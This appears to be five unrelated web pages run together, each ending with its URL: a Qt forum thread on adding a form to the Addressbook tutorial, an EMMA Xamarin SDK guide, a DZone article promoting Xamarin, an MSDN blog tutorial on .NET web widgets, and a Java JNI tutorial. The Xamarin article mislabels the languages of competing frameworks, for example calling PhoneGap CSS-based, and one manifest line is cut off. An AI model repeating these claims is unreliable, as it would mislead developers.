Hello all, I'm new to Qt and have to say that I am more than impressed. Easy to install and works out of the box. Lots of examples to get instant hands-on experience and what seems to be a thriving community. As a noob I am starting out by using the addressbook tutorial to look at the files and the logic behind C++ programming. Within the tutorial it doesn't seem to use a form to build the GUI, and personally I would like to add one so I can see what's going on. If anyone has already done this tutorial or can explain how I can add a form to integrate and display the existing info and buttons etc, it would be a great help in getting me started. Thanks in advance

Quick walk-through:

Create a .ui file
Add the .ui file to your project

In your class definition add:

@namespace Ui {
    class MyClass;
}

class MyClass : public QWidget
{
    ...
private:
    Ui::MyClass *ui;
};@

In your implementation:

@#include "ui_myclass.h"

MyClass::MyClass(QWidget *parent) :
    QWidget(parent),
    ui(new Ui::MyClass)
{
    ui->setupUi(this); // setupUi takes the widget to build the UI on
}

MyClass::~MyClass()
{
    delete ui;
}@

Hi Franzk

This is what I have done: right-click on the Addressbook.pro folder > Add New > Qt > but from there I have 4 choices:

- Qt Designer Form Class
- Qt Designer Form
- Qt Resource file
- Qt QML File

I have tried with both form and form class and I'm not sure which I need. Either way I click next and get the new options dialog, which displays more choices. I am hesitating between a main window and a widget. I believe widget is the way to go. As I am sure you already know, Form Class will create a .h and a .cpp file alongside the .ui file; these already contain the info you mentioned above. So I am guessing I need to use a form without a class and add the info you provided to the existing .h and .cpp files. Am I along the right lines or am I barking up the wrong tree?
If i do need a form without class, do i go main window or widget and finaly and probably the most important: Could you please explain what and where is the class definition that i need to add the above info to and when you say implementation, which file is that ( i thought it to be main.cpp) Thanks again I was under the impression that you wanted to add a ui to an already existing class. If that's not the case, your approach is the proper one. If you create a new form & class using Qt Creator, a .ui, .h and .cpp will be created (say myclass.ui, myclass.h and myclass.cpp). The classes involved are then MyClass, which is a QWidget derived class, MyClass_Ui which is a helper class that doesn't do much except setting up the UI, and Ui::MyClass, which is the same thing as MyClass_Ui, only in a namespace possibly to avoid ugly naming or so. To use your new widget, your application should then instantiate a MyClass. The Ui::MyClass class is of no use to anything other than MyClass itself. Thanks for your replies Franzk, but i have tried and tried since your last post, and no matter what i do i can't get the info to display on the form. I have tried everyway i can possibly think off and its just not happening. yes i know i'm a noob and that Cpp is probably the hardest programming language for a noob to start with, and that i have a whole load of learning and reading (which i am doing) to do, but a little extra help from yourself or anyone else would be greatly appreciated. Maybe a do this and then do that approach would help a lot. I just want to get the existing addressbook tutorial to display on a form. Please anyone, Help me, its so frustrating when your at the bottom of the ladder. So you're starting from the Addressbook example. Could you try to describe exactly what you want to add to it? And probably also what you already have done that worked out (in some way or another) for you? That will make it slightly easier for us to give you a recipe. 
Basicly i am following the tutorial (not the demo) and its all going as planned, except that something in the tutorial doesn't give the same result as the files included. Maybe i did something wrong, but i distinctly feel that the result and the tutorial examples are not the same. From there going directly to part 7 i see the whole example is there and already working (easier to learn with a full example). With all the files from part 7 open and browsing around i see there is no form for this working example. I basicly want to add a form and transfer the existing info, labels, buttons etc etc so they display within that new form. Maybe i have missed something or haven't made myself clear with my explanations. Thanks again, i understand it must be frustrating for hardened programmers such as yourself, when someone like myself has no idea where to start. But believe me i want to learn! [quote author="Atom Byte" date="1298729745"]Thanks again, i understand it must be frustrating for hardened programmers such as yourself, when someone like myself has no idea where to start. But believe me i want to learn![/quote]Don't worry about that. Everyone was a beginner once :P. I'll see if I can get to it somewhere this weekend. Else I hope someone else picks up from here. Don't go out of your way man, weekends are precious. Just a little guidence would more than appreciated. I didn't get to doing anything related to this. You got any progress? For the moment no i haven't, its so frustrating. Then i had my machine go crazy, so i have formatted and am in the process of re-installing everything. I think its down to installing wx widgets, dev c++, and a multitude of other programming tools to see what would be the easiest to learn with, but causing an eventual conflict somewhere. I am at the point where i am about to re-install QT and nothing else (programming).
https://forum.qt.io/topic/3925/adding-qtforms-to-existing-project/?
EMMA has two SDKs for Xamarin, one for Android and one for iOS. Both are "bindings" of the respective native libraries, so methods share names and integration is very similar to the native one.

1. Download the SDK

- iOS: binding 4.5.2 of the native SDK.
- Android: binding 4.5.3 of the native SDK.

2. Add the .dll to the project

First, you have to import the EMMA SDK into your Xamarin project. You have to add it in the References folder; this folder houses system libraries and third-party libraries. To add the SDK as a reference, copy the .dll file to the root folder of the project, then add the reference by right-clicking on the folder. Once the Edit References screen is open, go to the .Net Assembly tab and choose the .dll file. Click OK and you have the SDK integrated into the project. The Android procedure is the same; it is only necessary to add another reference to the project next to the EMMA SDK binding, InstallReferrer.dll. This reference can be found with the SDK dll in the GitHub repository.

3. Start session

In both OSes, to start a session you must declare the use of the library in the code:

using EMMASDK;

In Android, add it to the Application extension:

EMMA.Instance.StartSession(this);

You have to add the following code in AndroidManifest.xml:

<meta-data android:

In iOS, in AppDelegate.cs:

EMMA.StartSession("<EMMA Session Key>");

NOTE: If you are using Xamarin.Forms on iOS, add the following attribute in AppDelegate.cs:

public override UIWindow Window { get; set; }

4. Dependencies (Android only)

To integrate the SDK in Android, add the following packages in order:

- Kwon.Squareup.OkHttp3.Logging-interceptor (3.9.1.1)
- Kwon.Squareup.Retrofit2.Retrofit-converter (2.3.0.1)
- Karamunting.Xamarin.BumpTech.Glide (v4.8.0)
- Xamarin.Firebase.Messaging (71.1733.0) — optional, only for push.

You have to check the "Show pre-release" box to see it. Remember to add the InstallReferrer.dll reference cited above.

5.
Continue with integration

Once the above steps are done, you can use all the options offered by the EMMA SDK; consult the native libraries' integration documentation. The method names are identical; only the manner of invocation, with C#, changes.

Important

If you use push notifications, it is important to keep in mind that every time a Rebuild is made and the app is subsequently installed from Visual Studio, the push token is invalidated, because FCM detects that the app has been uninstalled. If this happens, uninstall the app manually and reinstall it; this will generate a new token. Before sending a test push from the EMMA platform, you can try a curl request against FCM to check whether the token is valid. If "NotRegistered" appears in the response, the token has been invalidated.

6. Sample App

For viewing the sample app, go to this GitHub repository:
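The token check mentioned in the Important note above can be sketched as follows. This is a hedged illustration of Google's legacy FCM HTTP endpoint with a dry_run send: the endpoint, the field names, and the YOUR_SERVER_KEY / DEVICE_PUSH_TOKEN placeholders are assumptions of this sketch, not part of the EMMA documentation. A "NotRegistered" result in the response means the token has been invalidated:

```python
import json

SERVER_KEY = "YOUR_SERVER_KEY"       # placeholder: your FCM server key
DEVICE_TOKEN = "DEVICE_PUSH_TOKEN"   # placeholder: the token to validate

# dry_run=True asks FCM to validate the token without delivering a push
payload = json.dumps({"registration_ids": [DEVICE_TOKEN], "dry_run": True})
headers = {"Authorization": "key=" + SERVER_KEY,
           "Content-Type": "application/json"}

# The actual request needs network access and real credentials:
# import urllib.request
# req = urllib.request.Request("https://fcm.googleapis.com/fcm/send",
#                              data=payload.encode(), headers=headers)
# print(urllib.request.urlopen(req).read())   # look for "NotRegistered"

print(payload)
```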
https://support.emma.io/hc/en-us/articles/208011149-Android-and-iOS-integration
Should App Developers Go for Xamarin? Building a cross platform mobile app remains challenging because programming language, event model, UI model, and resource model all differ from one platform to other. Xamarin can help with this. Join the DZone community and get the full member experience.Join For Free Be it a company or an entrepreneur, if an app needs to be developed for them, it cannot be just on one platform. The current mobile ecosystem works basically on 3 main platforms – Android, iOS, and Windows. For every new client the apps based on these 3 platforms need to be in stores, ready for downloads, as soon as possible. This is a big ask for app developers. The trouble with developing native apps is that you invest a lot of resources into projects, manage multiple development teams for each platform, spend time developing different code base, and end up reaching markets much later. Earlier app developers adopted one of the two ways to develop cross-platform apps. You could either develop the apps in silos where you needed Xcode, Eclipse, and Visual Studio (and Objective C, Java, and C#) to develop apps for iOS, Android, and Windows platforms respectively. It was a stressful way as anytime a new UI needed to be implemented all three teams on different platforms needed to work hand-in-hand to maintain uniformity. Or, you had platforms like Appcelator, Sencha, and PhoneGap which enabled the developer to code in one language (HTML for Appcelator, Javascript for Sencha, and CSS for PhoneGap) with one build targeting all platforms. In these cases the source code is interpreted at the run time. User experience and performance suffers. Building a cross platform mobile app remains challenging because programming language, event model, UI model, and resource model all differ from one platform to other. 
There was a need for a platform that enabled the developers to build applications for different operating systems using a single programming language, code base, and class library. Xamarin fills up this gap. With Xamarin, developers can share a lot of the app logic between platforms while building native UIs for each platform. Time to market gets reduced and clients get fluid performance of native apps without maintaining multiple code bases. Let’s Look at Xamarin Advantages Xamarin is a powerful platform that has several advantages. #1 Feature-rich Language Xamarin is equipped with a feature rich language C# with Lambda Expressions, Dynamic programming, LINQ, and has a rich APIs of .NET framework. Anything you can do in Objective-C, Swift, or Java, you can do in C#. Lately, Xamarin has added another powerful language called F# to its repertoire which adds to its credentials and makes it a go-to platform for app development. #2 Cost-effective Processes When building on Xamarin, it is possible for you to maintain the same code base for Android, iOS, and Windows phone applications. Developers are adopting Xamarin as it is one of the most cost effective ways to develop an app on all three platforms – Android, iOS, and Windows Phone in the shortest possible time. The only platform specific code is the UI. #3 Two Different IDEs When developers develop apps with Xamarin, they get two different integrated development environments (IDEs) – Visual Studio or Xamarin Studio to work on. They can choose any one of them that suits them and the platform they work on. Both Visual Studio and Xamarin Studio can help you create your backend with C#. #4 Compatible MVC and MVVM Design Patterns Xamarin supports both Model-View-Controller (MVC) and Model View ViewModel (MVVM) patterns. With the help of MVC pattern the developers are able to keep application logic and presentation neatly separate. The application code as a result is easier to modify, test, update, and maintain. 
MVVM pattern allows the programmers to create other projects while using the same code base as and when needed. There is bi-directional databinding between the view and the view model to ensure that the models and the properties in the view model are all in-sync with the view. The MVVM design pattern is for applications that require support for bi-directional databinding. #5 Code Reusage Xamarin provides the programmers option to reuse the code. This feature helps in reducing the coding time drastically. Programmers can use the same C# code for multiple mobile platforms. Possibilities become endless with custom plug-ins which can be compiled easily. Plug-ins are needed to communicate between JavaScript layer and C# layer. Once the communication is established the C# layer can be used across different devices reusing the codes. Even though C# code becomes reusable, the UI layer remains remarkably native in the particular Mobile OS Operating Environment. Xamarin thus is extremely versatile with integrated core. With Xamarin Forms developers claim that they achieve 96% reusability on their projects. #6 Shared App Logic When you build your apps on Xamarin, you need to code the application logic like database interactions, input validation, web service calls, backend enterprise integrations in C# just once. This app logic is then easily shared across multiple platforms. This saves on time and makes the builds stronger. #7 Portable Class Libraries Portable Class libraries or PCL make it easier for developers to share the same code base across multiple projects. The developers only need to write the code and libraries once and then they can be shared across Xamarin.iOS, Xamarin Android, and Windows Phone. PCL can be created with the help of Xamarin Studio or Visual Studio. Developers can create PCL for each platform. Interfaces can then be created to incorporate platform-specific functionality into the code. 
#8 Native Performance Unlike Phone gap or Appcelerator, apps run natively on Xamarin. The source code is compiled down to the native controls. Xamarin is built off the mono runtime, an Ecma standard compliant .Net Framework compatible and a C# compiler tool. The purpose of mono is to run Microsoft .Net applications cross-platform and this technology builds the foundation of cross-platform mobile development here. Developers write apps in C# and share the code base across different platforms. Xamarin leverages platform-specific hardware acceleration to make the mobiles deliver native performance. C# code after compilation gets converted into native binary code. C# code for iOS gets compiled ahead of time (AOT) into ARM binary code. C# code for Android Apps is compiled to intermediate language (IL), Just-In-Time and then is packaged with Android Virtual machine-Dalvik and Xamarin’s Mono VM. C# code for windows is compiled to IL and executed by the runtime. Apps built on Xamarin thus leverage platform-specific hardware acceleration and are compiled for native performance. Apps built on other cross-platform app building solutions interpret code at the runtime and thus cannot run natively. #9 Native User Interfaces Xamarin facilitates native user interfaces. Xamarin developers create app with native user interface (UI) controls. This enables the customization. Performance, look, and feel can be customized according to the mobile platform. An iOS app developed with Xamarin performs and looks just like an iOS application which is written in Objective-C. An android app developed using Xamarin looks, feels, and performs exactly like an android app developed using Java. As a cross platform development tool, Xamarin’s uniqueness lies in the fact that it separates application logic from the interface. Application codes are shared and native interface is built for each platform. 
The problem arises when Xamarin’s customers have big enterprise apps to develop and they don’t want to write a new interface for each screen on multiple platforms. Xamarin.Forms solves this problem. #10 Xamarin.Forms Xamarin.Forms is an API, a cross platform natively backed UI toolkit abstraction which helps in building user interface code that can be shared across iOS, Android, and Windows Phone apps. It is for the times the clients of Xamarin don’t want to develop native interfaces for devices on multiple platforms for an enterprise app as the size of the app is big. Xamarin.Forms is a library that contains about 40 common UI controls and navigation abstractions that make up the UI of different apps. Controls in the gallery include abstraction of pages-iOS ViewController, Android Activity or WP Page, Composable containers for layouts such as Grid and StackLayout, Abstractions for views-buttons, labels, text boxes, date and time pickers, images and more, controls for cells that allow you to combine a label with another visual element in tables and lists. These controls are available across platforms. When used on specific platforms and compiled, they are mapped to render native UI controls to get the look and feel of native components. You can choose and pick elements you want from both XF and native UI. Xamarin.Forms can only be used on iOS 6.1+, Android 4.0+, and Windows Phone 8 platforms. Older versions of these platforms are not compatible. #11 Native API Access Xamarin makes 100% of the iOS and Android APIs available through native bindings. It is the only platform with deep code sharing capabilities across iOS, Android, and Windows apps. Developers can refer to Apple’s CocoaTouch SDK frameworks and Google’s Android SDK as namespaces with C# syntax. Developers can also access platform specific features like iBeacons or Android fragments at the same time. Native API access makes it easier for developers to use C# syntax to access platform specific UI controls. 
#12 Enables High Performance Apps Apps built on Xamarin are not interpreted; they are compiled to a native binary. This native binary compilation provides the users with fluid app performance with native user interface. Xamarin apps can therefore deliver high performance and can be used for most demanding scenarios which require multi-touch user input, smooth scrolling, sophisticated animations and graphics, complex data visualization–like for flight simulation graphics and games that require high frame rates. #13 Cloud-hosted Test Service Xamarin provides a cloud-hosted test service. It provides a locally executed scripting environment to help you imitate and automate actions like a real mobile app user. It hosts more than 1,000 real non-jail broken devices in the test cloud–industry’s largest device cloud. You can run test scripts parallelly on hundreds of devices at a time. The test reports help you identify and troubleshoot bugs, UI problems, crashes, memory, and performance issues. With the help of Xamarin you can debug your code that you can run on hosted devices of your choosing. An automated cross platform test framework handles the applications you run. With the help of Xamarin Test cloud you can integrate device testing into your build process. You get test reports that provide you performance data. It helps you ensure every release is a quality release. You can make changes in your code and see the effect of those changes by comparing different test runs. The best part is you don’t have to write your own tests for the test cloud. Xamarin’s expert mobile app automation engineers can coach your team. You can also send your app and outsource the testing process to Xamarin. The experts author and conduct tests for you and send you the actionable report. #14 Xamarin Component Store Xamarin Component Store is built into Xamarin Studio and Xamarin’s Visual Studio extensions so that developers can add the needed component to the app with a few clicks. 
There are a lot of free and paid components for developers to choose from. There are third party web services and apps, cross-platform libraries, charts and graphs, UI controls, Cloud services, beautiful themes, and other powerful features–all to enhance Android, iOS, and Windows applications. All Xamarin components include a getting-started guide and a sample project. Some apps that were built using Xamarin are Cinemark, Mix Radio, Storyo, Novarum, Honeywell, etc. What do the naysayers say? Some app developers are not too fond of Xamarin. There are practical difficulties. It is costly. The licence cost per developer is very high. It is a new tool with a hefty price tag. Developers need to overcome a learning curve to use Xamarin–the Xamarin IDE and framework. Learning a new platform, language, and toolset takes time. Developers need to be fluent with C#/.Net. They need to know the iOS and Android frameworks, their user interfaces and lifecycles. In short, a developer would need to know all about android app development, iOS app development, and Windows app development along with the C#/.Net the language the codes will be written in. Xamarin will always need to be on its toes; everytime Android or iOS release a new SDK, Xamarin needs to update and release its APIs to match the SDKs as soon as possible. Xamarin does not allow code share or reuse outside of its own environment. This proves to be a limiting factor for some developers. It is a growing technology. Xamarin.Forms don’t address all the needs. It supports 40 UIs and controls. Developers still need access to several other Android specific UI controls. It has a smaller ecosystem. It is tough to find crowdsourced community support and solutions. Developers depend only on the Xamarin support when the bugs and other issues crop up. Productivity of designers and QAs suffer because of its smaller ecosystem. 
Conclusion

There are several cross-platform mobile development tools, such as PhoneGap, Sencha, Appcelerator, and Corona, but Xamarin is proving to be one of the most popular cross-platform mobile application development platforms. With the help of Xamarin, app developers can now build Android, iOS, and Windows Phone apps using the same C# codebase: the code is written in C#, and the platform-agnostic parts can be shared between iOS, Android, and Windows Phone. The apps are completely native and reach the market sooner. Xamarin provides a new way to make cross-platform apps and has its own ecosystem, which can feel a little uncomfortable and limiting for some developers. So, should app developers go for Xamarin? If you have the need and the right resources, definitely.

Published at DZone with permission of Openxcell Inc. See the original article here. Opinions expressed by DZone contributors are their own.
https://dzone.com/articles/should-app-developers-go-for-xamarin?utm_medium=feed&utm_source=feedpress.me&utm_campaign=Feed%3A+dzone%2Fmobile
Thoughts and Discussion about Software Development and Technology

Web Widgets with .Net : Part One

This two-part article is based on a presentation I gave at Tech Ed North America, Developers Week, 2008, about using .Net to create Web Widgets for the MSDN and TechNet sites. Part one will cover the creation of a basic widget, written in C# and JavaScript. Part two will update that widget to be more dynamic using C#, LINQ, JavaScript, JSON (JavaScript Object Notation), and CSS.

Web Widgets : A Simple Definition

The best place to start is to give you a definition of Web Widgets. From Wikipedia.org, the following is a good description: "(a web widget) is a portable chunk of code that can be installed and executed within any separate HTML-based web page by an end user without requiring additional compilation." The basic idea is that a consumer site only needs to deploy a simple script block which requires no compilation. We achieve this by setting the script block's source (src) parameter to a Uri on a separate widget host server. All server-side processing is done on the host server, which sends back client-side script to render the widget on the consuming page. There are probably hundreds of possible ways to build a Web Widget, but I'm going to walk through one specific example using .Net. Typically, Web Widgets can be consumed on any domain outside the host domain. However, browser cookie data is only available in the Request if the widget is deployed within the same domain as it is hosted. Additionally, Request information such as Server Variables and QueryString are available in any domain.

Let's Write Some Code : A Basic Widget using an HttpHandler

Now that we've covered some background about what we are building, let's get to work. As I mentioned before, we are going to be using C# and JavaScript to build this.
You could really use any .Net language for the middle tier, but I found that the syntactical similarities between JavaScript and C# made switching gears between the two tiers a bit less jarring. The code for this first example can be downloaded here:

Step 1 : Create an HttpHandler Base Class for all widgets to use.

First, let's create a base class that can be used for multiple widgets. It will handle the basic functionality of an HttpHandler. Note: I chose to use an HttpHandler here in order to avoid the overhead of the ASP.Net Lifecycle. There is no need in this pattern to use Viewstate, Page Events, or Postbacks, so I can avoid all the unnecessary overhead by using an HttpHandler.

1) Create a new Visual Studio C# Web Project and call it "Demo1"
2) Add a new directory called Handlers and add a WidgetBase.cs class file inside this folder. Mark that class as abstract since it will be our base class.
3) Implement the IHttpHandler interface
4) Using the VS2008 IntelliSense context menu, stub out the required members for an HttpHandler. This will add the following interface members:

IsReusable - property to let IIS know whether this handler can be re-used by other threads.
ProcessRequest(HttpContext context) - the main method of a handler. This is where we will do the work to write a response to the browser.

5) Set IsReusable to return false to ensure thread safety – we don't want any other requests to come in and modify variables.
6) Add null reference checks to ProcessRequest, to avoid null reference exceptions:

if (context != null && context.Request != null && context.Response != null) { }

7) Add an abstract BuildOutput() method that returns a string. We want to force inheritors to use this method.
public abstract string BuildOutput();

8) Add a member variable to hold a reference to the HttpContext object that is passed into ProcessRequest:

private HttpContext _context;

9) In ProcessRequest, Response.Write the results of BuildOutput, using the Response object in the _context member variable just added in step 8:

_context = context;
_context.Response.Write(BuildOutput());

10) Add Request and Response shortcuts, using the _context member variable. We will be using these shortcuts later, in the widgets that use this base class.

/// <summary>
/// Shortcut to Response object
/// </summary>
public HttpResponse Response
{
    get { return _context.Response; }
}

/// <summary>
/// Shortcut to Request object
/// </summary>
public HttpRequest Request
{
    get { return _context.Request; }
}

That is all the work we need to do in WidgetBase for now. Let's move on to create a class that derives from WidgetBase.

Step 2 : Create an EventsWidget class and wire up the handler in IIS

1) Add a new class file called EventsWidget.cs to the Handlers directory
2) Implement the WidgetBase class and stub out the BuildOutput method using the handy VS2008 Intellisense dropdown
3) Create and return a string called "output" in the BuildOutput method and initialize it to the common "Hello World!" value, since this is the first time we'll run this application.

public override string BuildOutput()
{
    string output = "Hello World!";
    return output;
}

4) Open an IIS Management Console and navigate down to the application you are running this project in. (Create an application if you haven't already)
5) In the application configuration features view, look for the "Handler Mappings" feature and double click it to see a list of existing handlers.
6) In the "Actions" area of this view, click the link to "Add Managed Handler"
7) Set up the new Managed Handler similar to the settings below.
Request Path: eventswidget.jss
Type: Demo1.Handlers.EventsWidget
Name: EventsWidget

8) The handler should be ready to run now, so let's check it in a browser. Open up your favorite browser and navigate to the application you've been working in. Add the request path you created in step 7 above to the URI to hit the handler you've created. You should see a friendly "Hello World!" message on the screen.

Step 3 : Modify the HttpHandler to output JavaScript

1) Add a new directory called "templates" to hold script templates, and add a new file called core.js. This file will be used as a utility class to hold functions common to widgets.
2) Open /templates/core.js and add the following code to set up a namespace, constructor, and class definition for an object called Core. (Note: you should modify the namespace to match your own company or team)

/** Microsoft.Com.SyndicationDemo.Core.js: shared functionality for widgets **/

// Namespace definition : All Widget Classes should be created in this namespace
if (!window.Microsoft) window.Microsoft = {};
if (!Microsoft.Com) Microsoft.Com = {};
if (!Microsoft.Com.SyndicationDemo) Microsoft.Com.SyndicationDemo = {};

// Widget Core Constructor
Microsoft.Com.SyndicationDemo.Core = function(message) {
    document.write(message);
};

// Widget Core Class Definition
Microsoft.Com.SyndicationDemo.Core.prototype = {
};

var core = new Microsoft.Com.SyndicationDemo.Core("Hello from JS!");

The above JavaScript code uses a feature of the JavaScript language called prototype-based programming to create a class definition. When we "new" up an instance of this Core object, it will run the code in the constructor and write out a message via JavaScript.

3) Add a method to WidgetBase which will allow us to read the contents of the JavaScript file we just created.
Modify WidgetBase.cs by adding the following method:

public string ReadFromFile(string fileName)
{
    string fileContents = string.Empty;
    if (HttpContext.Current.Cache[fileName] == null)
    {
        string filePath = HttpContext.Current.Server.MapPath(fileName);
        if (File.Exists(filePath))
        {
            StreamReader reader;
            using (reader = File.OpenText(filePath))
            {
                fileContents = reader.ReadToEnd();
            }
        }
        HttpContext.Current.Cache.Insert(fileName, fileContents,
            new System.Web.Caching.CacheDependency(filePath));
    }
    else
        fileContents = (string)HttpContext.Current.Cache[fileName];
    return fileContents;
}

4) Modify EventsWidget.cs to read the JavaScript file using the method we just created. Change the content of the BuildOutput() method to the following:

string output = base.ReadFromFile(ConfigurationSettings.AppSettings["CoreJavascriptFileName"]);
return output;

5) Lastly, let's hook up this handler in a script block so that it actually runs in a script context. Add a new file called default.aspx to the root of the application. This file will serve as a test harness for our widgets. Add the following script block to the new page:

<script type="text/javascript" src="eventswidget.jss"> </script>

6) At this point, we can now hit the new default.aspx in the browser. It should display a friendly message from JavaScript. If you do not see any message, try hitting the handler directly to see if it is throwing an error.

In part two of this article, I will use this project as a starting point and make it dynamic. Part two will cover accessing data, passing data to JavaScript, and working with styles via CSS.

i cannot access the widget from another domain. any ideas?

Which version of IIS are you using? I don't see the Add Managed Handler dialog box in the Microsoft Management Console version 3.0.
Thanks, pcrabtree@raritantechnologies.com Crabtree, I am using IIS 7.0. The "Add Managed Handler" feature was not included in IIS 6.0. Try the following steps to find the feature. 1) Using MMC snap-in for IIS 7.0, click on the site or application you want to manage. This will display a list of features that you can manage, grouped by area (ASP.NET, IIS, Management). 2) Look in the IIS area for a feature called "Handler Mappings" and double click on it. This will take you to the "Handler Mappings" management feature. The main window displays a list of existing mappings, and the right pane displays a list of Actions you can take. 3) In the right pane, look for "Add Managed Handler" link and click on it. This will open the feature's dialog box, where you can follow the rest of the steps listed in my post above. You can also access this feature by right-clicking anywhere in the list of existing mappings. Hope that helps! Newbie, Can you provide any more information about the problem? Are you able to see any errors that might help me troubleshoot the issue? Also, you might try tools like Fiddler, httpWatch, or Firebug to see if there are networking or script errors with your widget. These types of debugging tools are absolutely invaluable when working with widgets! Great article! One question though, Is there any way to deploy/implement a .NET based widget with IIS 6.0 (which doesn't have a managed handlers option of IIS 7.0 Mgt Console)? Nissan, I haven't hooked this project up on an IIS 6.0 server, but you should be able to do the following to add an HttpHandler in IIS 6. The config setting for the Handlers in IIS 6.0 are stored in a different web.config section, see below... <system.web> <httpHandlers> <add verb="GET,HEAD" path="eventswidget.jss" type="Demo1.Handlers.WidgetBase, Demo1" validate="false" /> </httpHandlers> </system.web> Please comment back if this doesn't work for you! Hi Paul, Thanks for this share this work. Could you help me plz. 
I tried to use in net2 using one external Json.net library. My problem is not this, but after full compiling with no errors and tried I have one error during use like: abstract class not well formed in WidgetBase Demo1, same problem in Demo2 in C#2005. I have controled many times and verify definition of abstract classes but nothing. Some suggestion. Regards Hey Paul, I implemented the recommendation you posted, and while it worked fine on my VS 2008 development environment, once I checked in my changes and it built to the Windows 2003 Server testing box it resulted in a "The page cannot be found" error when trying to reference the eventswidget.jss file. Now to be honest my dev box is Vista not XP but I am debugging in VS 2008 Pro so it should have worked once deployed to the 2003 server running IIS 6.0 since it executed the web.config changes successfully to render the page on the VS 2008 internal web server. Any ideas on next steps to troubleshooting this error? Hi Nissan, If you deploy to IIS 6.0, the web.config file will store the httpHandlers in a different section. This would cause you to get the 404 error. Please try the following. I was just wandering if i could create some web widgets (using VS 2005/2008, C#). The code is superb and i could create and add my own widget to my local sample application. However, I have few questions... 1. Do I need Scripts to make the widgets work? 2. Is there any mechanism provided by ASP.NET to build widgets? 3. Is there any tool which could emit Javascript for me? 4. Can I use AJAX to create widgets? It'll be very grateful if you throw some light on the questions i have. Regards, Amit Gautam I am unable to download the code from the given link...i get a server error. Is there any other way i can get the code. Thanks Ramesh, Please give that link another try. I think you may have hit a temporary error on the Code Gallery site. 
I don't have the code hosted anywhere else, so hopefully that link will work for you the second time. If not, please let me know and I will see what I can do.

Amit, I'll attempt to answer your questions inline below...

In the scenario I've demonstrated, yes. There are many ways to make widgets though, and you could conceivably find a way to just inject HTML into the consuming page without using JavaScript. Try searching for other widgets on the web and you will find other technologies used to achieve the same purpose.

With the ASP.Net MVC framework and jQuery you could create widgets. I am looking into writing a part 3 of this article using ASP.Net MVC and jQuery.

Look into script#. Also, if you are shy about JavaScript, the jQuery library can provide a much easier way for you to utilize the language without the huge learning curve.

Yes, and you could use Ajax to load data into widgets as well. I was attempting to create a one-request widget with this article, so I avoided making additional Http calls via Ajax. If you use the ASP.Net Ajax library, you need to ensure the consuming site also uses this technology.
http://blogs.msdn.com/pajohn/archive/2008/06/18/web-widgets-with-net-part-one.aspx
Native Methods

Although it is rare, occasionally you may want to call a subroutine that is written in a language other than Java. Typically, such a subroutine exists as executable code for the CPU and environment in which you are working—that is, native code. For example, you may want to call a native code subroutine to achieve faster execution time. Or, you may want to use a specialized, third-party library, such as a statistical package. However, because Java programs are compiled to bytecode, which is then interpreted (or compiled on-the-fly) by the Java run-time system, it would seem impossible to call a native code subroutine from within your Java program. Fortunately, this conclusion is false. Java provides the native keyword, which is used to declare native code methods. Once declared, these methods can be called from inside your Java program just as you call any other Java method. To declare a native method, precede the method with the native modifier, but do not define any body for the method. For example:

public native int meth();

A detailed description of the JNI is beyond the scope of this book, but the approach described here provides sufficient information for simple applications. The easiest way to understand the process is to work through an example. To begin, enter the following short program, which uses a native method called test():

// A simple example that uses a native method.
public class NativeDemo {
    int i;
    public static void main(String args[]) {
        NativeDemo ob = new NativeDemo();
        ob.i = 10;
        System.out.println("This is ob.i before the native method:" + ob.i);
        ob.test(); // call a native method
        System.out.println("This is ob.i after the native method:" + ob.i);
    }

    // declare native method
    public native void test();

    // load DLL that contains static method
    static {
        System.loadLibrary("NativeDemo");
    }
}

Notice that the library containing test() is loaded by the loadLibrary() method, which is part of the System class.
This is its general form:

static void loadLibrary(String filename)

Here, filename is a string that specifies the name of the file that holds the library. For the Windows environment, this file is assumed to have the .DLL extension. After you enter the program, compile it to produce NativeDemo.class. Next, you must use javah.exe to produce one file: NativeDemo.h. (javah.exe is included in the JDK.) You will include NativeDemo.h in your implementation of test(). To produce NativeDemo.h, use the following command:

javah -jni NativeDemo

This command produces a header file called NativeDemo.h. This file must be included in the C file that implements test(). The output produced by this command is shown here:

/* DO NOT EDIT THIS FILE - it is machine generated */
#include <jni.h>
/* Header for class NativeDemo */
#ifndef _Included_NativeDemo
#define _Included_NativeDemo
#ifdef __cplusplus
extern "C" {
#endif
/*
 * Class:     NativeDemo
 * Method:    test
 * Signature: ()V
 */
JNIEXPORT void JNICALL Java_NativeDemo_test
  (JNIEnv *, jobject);
#ifdef __cplusplus
}
#endif
#endif

Pay special attention to the following line, which defines the prototype for the test() function that you will create:

JNIEXPORT void JNICALL Java_NativeDemo_test(JNIEnv *, jobject);

Notice that the name of the function is Java_NativeDemo_test(). You must use this as the name of the native function that you implement. That is, instead of creating a C function called test(), you will create one called Java_NativeDemo_test(). The NativeDemo component of the prefix is added because it identifies the test() method as being part of the NativeDemo class. Remember, another class may define its own native test() method that is completely different from the one declared by NativeDemo. Including the class name in the prefix provides a way to differentiate between differing versions. As a general rule, native functions will be given a name whose prefix includes the name of the class in which they are declared.
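The naming rule just described is mechanical, so it can be captured in a few lines of code. The sketch below (a Python illustration, not part of the JNI toolchain) builds the short-form JNI function name from a class and method name; note that the full JNI specification also escapes underscores and non-ASCII characters, which this simplified version ignores:

```python
def jni_function_name(class_name, method_name):
    """Short-form JNI native function name: Java_<class>_<method>.

    Package separators ('.') become underscores, so pkg.NativeDemo.test
    maps to Java_pkg_NativeDemo_test. (The real rules also escape '_'
    and Unicode characters; this sketch omits that.)
    """
    return "Java_" + class_name.replace(".", "_") + "_" + method_name

print(jni_function_name("NativeDemo", "test"))  # Java_NativeDemo_test
```

This is why two classes can each declare their own native test() without clashing: the generated C-level names differ because the class name is baked into the prefix.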
After producing the necessary header file, you can write your implementation of test() and store it in a file named NativeDemo.c:

/* This file contains the C version of the test() method. */
#include <jni.h>
#include "NativeDemo.h"
#include <stdio.h>

JNIEXPORT void JNICALL Java_NativeDemo_test(JNIEnv *env, jobject obj)
{
    jclass cls;
    jfieldID fid;
    jint i;

    printf("Starting the native method.\n");
    cls = (*env)->GetObjectClass(env, obj);
    fid = (*env)->GetFieldID(env, cls, "i", "I");
    if (fid == 0) {
        printf("Could not get field id.\n");
        return;
    }
    i = (*env)->GetIntField(env, obj, fid);
    printf("i = %d\n", i);
    (*env)->SetIntField(env, obj, fid, 2*i);
    printf("Ending the native method.\n");
}

